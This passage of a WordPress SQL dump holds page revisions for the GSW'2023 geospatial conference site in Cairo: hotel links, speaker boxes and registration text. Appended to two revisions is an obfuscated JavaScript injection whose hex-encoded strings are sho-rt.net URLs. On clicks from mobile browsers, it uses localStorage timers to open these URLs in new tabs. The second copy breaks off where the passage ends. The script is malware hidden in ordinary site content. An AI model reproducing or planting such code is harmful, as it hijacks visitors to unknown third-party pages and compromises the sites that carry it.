primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<p>  [/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2022-10-09 03:36:20','2022-10-09 03:36:20','',2685,'https://gsw2023.com/?p=2694',0,'revision','',0),
(2695,1,'2022-10-09 03:49:50','2022-10-09 03:49:50','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665273584331{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #F2EAD0), color-stop(95%, #F2EAD0));background: -moz-linear-gradient(left,#F2EAD0 10%,#F2EAD0 95%);background: -webkit-linear-gradient(left,#F2EAD0 10%,#F2EAD0 95%);background: -o-linear-gradient(left,#F2EAD0 10%,#F2EAD0 95%);background: -ms-linear-gradient(left,#F2EAD0 10%,#F2EAD0 95%);background: linear-gradient(left,#F2EAD0 10%,#F2EAD0 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return 